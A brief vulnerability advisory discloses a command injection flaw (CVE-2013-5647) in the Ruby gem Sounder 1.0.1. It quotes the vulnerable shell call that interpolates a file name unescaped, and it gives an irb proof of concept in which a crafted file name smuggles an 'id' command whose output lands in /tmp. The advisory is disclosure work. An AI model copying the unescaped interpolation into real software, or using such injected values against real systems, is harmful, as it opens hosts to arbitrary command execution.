VDB-ID: 101 Title: Command Injection in Ruby Gem Sounder 1.0.1 Vulnerability Date: 2013-08-10 Download: https://rubygems.org/gems/sounder Vendor: Adam Zaninovich Notified: 2013-08-10 Vendor Contact: adam.zaninovich@gmail.com Description: Sounder is a ruby gem API for Mac OSX's afplay command. Vulnerability: From lib/sounder/sound.rb: def play system %{/usr/bin/afplay "#{@file}" &} end CVE-IDs: 2013-5647 Exploit: irb(main):098:0> @file = "\"id;/usr/bin/id>/tmp/p;\"" => "\"id;/usr/bin/id>/tmp/p;\"" irb(main):099:0> system %{/bin/echo "#{@file}" } id sh: 1: : Permission denied => false irb(main):100:0> larry@underfl0w:/tmp$ cat /tmp/p uid=1000(larry) gid=600(staff) groups=600(user) URL: http://www.vapid.dhs.org/advisories/sounder-ruby-gem-cmd-inj.html Credit: Larry W. Cashdollar, @_larry0